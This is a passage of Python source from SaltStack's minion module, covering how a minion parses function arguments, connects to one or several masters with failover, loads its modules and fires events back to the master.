if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
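# Hedged usage sketch (paths assumed):
#   get_proc_dir('/var/cache/salt/minion', mode=0o700, uid=0, gid=0)
# ensures /var/cache/salt/minion/proc exists with the given mode and, on
# unix-like systems only, the given ownership.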
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
                # Don't append the version that was just derived from parse_input
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Nitrogen',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
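# Hedged example of the parsing above: args like
#   ['foo', {'__kwarg__': True, 'bar': 1}]
# yield _args == ['foo'] and _kwargs == {'bar': 1}; when the target function
# accepts **kwargs and `data` is a dict, '__pub_*' keys are packed in as well.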
def eval_master_func(opts):
'''
    Evaluate the master function if master type is 'func'
    and save its result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
if not isinstance(opts['master'], str):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module {0}'.format(mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('{0} returned from {1} is not a string'.format(opts['master'], mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(mod_fun))
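# Hedged config sketch (my_module.get_master is a hypothetical
# module.function name): with
#   master_type: func
#   master: my_module.get_master
# in the minion config, the loader calls my_module.get_master() and stores
# its string return value in opts['master'].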
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
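# Examples derived from event_map above: master_event('connected') returns
# '__master_connected', and master_event('alive', 'master1') returns
# '__master_alive_master1'.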
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
        returned. If this function is called outside the minion's initialization
        phase (for example from the minion's main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# check if master_type was altered from its default
elif opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
        # we're probably called from the minion's main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info('Moving possibly failed master {0} to the end of'
' the list of masters'.format(opts['master']))
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
                # If failover is set, the minion has to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        # FIXME: if SMinion doesn't define io_loop, it can't switch master; see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
resolve_dns_fallback = opts.get('resolve_dns_fallback', False)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
opts['local_masters'] = copy.copy(opts['master'])
if opts['random_master']:
shuffle(opts['local_masters'])
last_exc = None
opts['master_uri_list'] = list()
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
except SaltClientError as exc:
last_exc = exc
msg = ('Master hostname: \'{0}\' not found. Trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
msg = ('No master could be reached or all masters '
'denied the minions connection attempt.')
log.error(msg)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not HAS_ZMQ:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if self.opts['transport'] == 'zeromq' and HAS_ZMQ:
io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
io_loop = LOOP_CLASS.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['environment'] is not None:
penv = self.opts['environment']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.fopen(ptop, 'wb') as fp_:
fp_.write(yaml.dump(cache_top))
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.fopen(cache_sls, 'wb') as fp_:
fp_.write(yaml.dump(self.opts['pillar']))
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
if self.opts.get('master_type') != 'disable':
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
funcs=self.functions,
rend=self.rend,
).compile_pillar()
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(opts['conf_file'], ignore_config_errors=ignore_config_errors)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
    Create a multi-minion interface; this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
        self.io_loop.spawn_callback(self.process_manager.run, **{'async': True})  # 'async' became a reserved word in Python 3.7; pass it via kwargs expansion so the file still parses
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if self.opts['master_type'] == 'failover' or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
while True:
try:
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(minion.opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(minion.opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
def reload(self):
for minion in self.minions:
minion.reload()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = jid_queue
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
        # Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
log.info('Creating minion process manager')
self.process_manager = ProcessManager(name='MinionProcessManager')
        self.io_loop.spawn_callback(self.process_manager.run, **{'async': True})  # 'async' became a reserved word in Python 3.7; pass it via kwargs expansion so the file still parses
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
def reload(self):
log.info('Minion reloading config')
disk_opts = salt.config.minion_config(os.path.join(salt.syspaths.CONFIG_DIR, 'minion')) # FIXME POC
self.opts = salt.utils.dictupdate.merge_overwrite(self.opts, disk_opts)
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
            # add default scheduling jobs to the minion's scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
self.grains_cache = self.opts['grains']
self.ready = True
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
                    'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1}); '
                    'both must be positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
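    # Hedged config sketch: with return_retry_timer: 5 and
    # return_retry_timer_max: 10 in the minion config, this returns a random
    # integer in [5, 10]; without return_retry_timer_max it returns 5 as-is.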
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
        # if this is a *nix system AND modules_max_memory is set, let's enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True):
'''
        Fire an event on the master, or drop the message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
def timeout_handler(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
return False
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
# Don't duplicate jobs
log.trace('Started JIDs: {0}'.format(self.jid_queue))
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
        # We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
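    # Note: ctx() is consumed in _target() below via
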